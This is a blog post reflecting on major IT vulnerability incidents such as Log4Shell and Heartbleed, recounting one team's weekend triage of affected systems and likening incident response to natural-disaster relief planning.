For every kind of natural disaster, there is a “Big One”. Everybody who lived through it remembers the time, everybody else has at least heard stories about it. Every time a similar natural disaster occurs, it gets compared to this one.
We just remembered the “Boxing Day Tsunami” twenty years ago. Another example might be “The Big One”, the devastating earthquake of San Francisco in 1906. From today’s viewpoint, it wasn’t the strongest earthquake since, but it was one of the first to be extensively covered by “modern” media. It preceded the Richter scale, so we can’t directly compare it to current events.
In the rather young history of IT, we had our fair share of “natural” disasters as well. We used to give the really bad ones nicknames. The first vulnerability that was equipped with a logo and its own domain was heartbleed in 2014, ten years ago.
Let’s name-drop some big incidents:
- XZ Utils Backdoor in 2024: CVE-2024-3094
- Log4Shell in 2021: CVE-2021-44228
- Spectre and Meltdown in 2018: CVE-2017-5715 and CVE-2017-5754
- Heartbleed in 2014: CVE-2014-0160
- Debian Weak Keys Vulnerability in 2008: CVE-2008-0166
- Sasser Worm in 2004: CVE-2003-0533
- Blaster Worm in 2003: CVE-2003-0352
The first entry in this list is different from the others in that it was a “near miss”. It would have been a vertitable catastrophe with millions of potentially breached and compromised systems. It just got discovered and averted right before it would have been distributed worldwide.
Another thing we can deduce from the list is the number of incidents per year:
https://www.cve.org/about/Metrics
From around 5k published vulnerabilities per year until 2014 (roughly one every two hours) it rose to 20k in 2021 and 30k in 2024. That’s 80 reports per day or 4 per hour. A single human cannot keep up with these numbers. We need to rely on filters that block out the noise and highlight the relevant issues for us.
But let’s assume that the next “Big One” happens and attains our attention. There is one common characteristic for all incidents I witnessed that is similar to earthquakes or floods: It happens everywhere at once. Let me describe the situation at the example of Log4Shell:
The first reports indicated a major vulnerability in the log4j package. That seemed bad, but it was a logging module, what could possibly happen? We could lose the log files?
It soon became clear that the vulnerability can be used from a distance by just sending over a malicious request that gets logged. Like a web request without proper authentication to a route that doesn’t exist. That’s exactly what logging is for: Capturing the outliers and preserving them for review.
Right at the moment that it dawned on us that every system with any remote accessibility was at risk, the first reports of automated attacks emerged. It was now friday late evening, the weekend just started and you realized that you are in a race against bots. The last thing you can do is call it a week and relax for 2 days. In these 48 hours, the war is lost and the systems are compromised. You know that you have at most 4 hours to:
- Gather a list of affected projects/systems
- Assess the realistic risk based on current knowledge
- Hand over concrete advice to the system’s admins
- Or employ the countermeasures yourself
In our case, that meant to review nearly 50 projects, document the decision and communicate with the operators.
While we did that, during friday night, new information occurred that not only log4j 2.x, but also 1.x was susceptible to similar attacks.
We had to review our list and decisions based on the new situation. While we were doing that, somebody on the internet refuted the claim and proclaimed the 1.x versions safe.
We had to split our investigation into two scenarios that both got documented:
- scenario 1: Only log4j 2.x is affected
- scenario 2: All versions of log4j are vulnerable
We employed actions based on scenario 1 and held our breath that scenario 2 wouldn’t come true.
One system with log4j 1.x was deemed “low impact” if down, so we took it off the net as a precaution. Spoiler: scenario 2 was not true, so this was an unnecessary step in hindsight. But in the moment, it was one problem off the list, regardless of scenario validity.
The thing to recognize here is that the engagement with the subject is not linear and not fixed. The scope and details of the problem change while you work on it. Uncertainties arise and need to be taken into account. When you look back on your work, you’ll notice all the unnecessary actions that you did. They didn’t appear unnecessary in the moment or at least you weren’t sure.
After we completed our system review and had carried out all the necessary actions, we switched to “survey and communicate” mode. We monitored the internet talk about the vulnerability and stayed in contact with the admins that were online. I remember an e-mail from an admin that copied some excerpts from the server logfiles with the caption: “The attacks are here!”.
And that was the moment my heart sank, because we had totally forgotten about the second front: Our own systems!
Every e-mail is processed by our mailing infrastructure and one piece of it is the mail archive. And this system is written in Java. I raced to gather insights what specific libraries are used in it. Because if a log4j 2.x library were included, the friendly admin would have just inadvertently performed a real attack on our infrastructure.
A few minutes after I finished my review (and found a log4j 1.x library), the producer of the product sent an e-mail, validating my result by saying that the product is not at risk. But those 30 minutes of uncertainty were pure panic!
In case of an airplane emergency, they always tell you to make sure you are stable first (i.e. place your own oxygen mask first). The same thing can be said about IT vulnerabilities: Mind your own systems first! We would have secured our client’s systems and then fallen prey to friendly fire if the mail archive would have been vulnerable.
Let’s re-iterate the situation we will find ourselves in when the next “Big One” hits:
- We need to compile a list of affected instances, both under our direct control (our own systems) and under our ministration.
- We need to assess the impact of immediate shutdown. If feasible, we should take as many systems as possible out of the equation by stopping or airgapping them.
- We need to evaluate the risk of each instance in relation to the vulnerability. These evaluations need to be prioritized and timeboxed, because they need to be performed as fast as possible.
- We need to document our findings (for later revision) and communicate the decision or recommendation with the operators.
This situation is remarkably similar to real-world disaster mitigation:
- The lists of instances are disaster plans
- The shutdowns are like evacuations
- The risk evaluation is essentially a triage task
- The documentation and delegation phase is the command and control phase of disaster relief crews
This helps a lot to see which elements can be prepared beforehands!
The disaster plans are the most obvious element that can be constructed during quiet times. Because no disaster occurs according to plan and plans tend to get outdated quickly, they need to be intentionally fuzzy on some details.
The evacuation itself cannot be fully prepared, but it can be facilitated by plans and automation.
The triage cannot be prepared either, but supported by checklists and training.
The documentation and communication can be somewhat formalized, but will probably happen in a chaotic and unpredictable manner.
With this insight, we can look at possible ideas for preparation and planning in the next part of this blog series.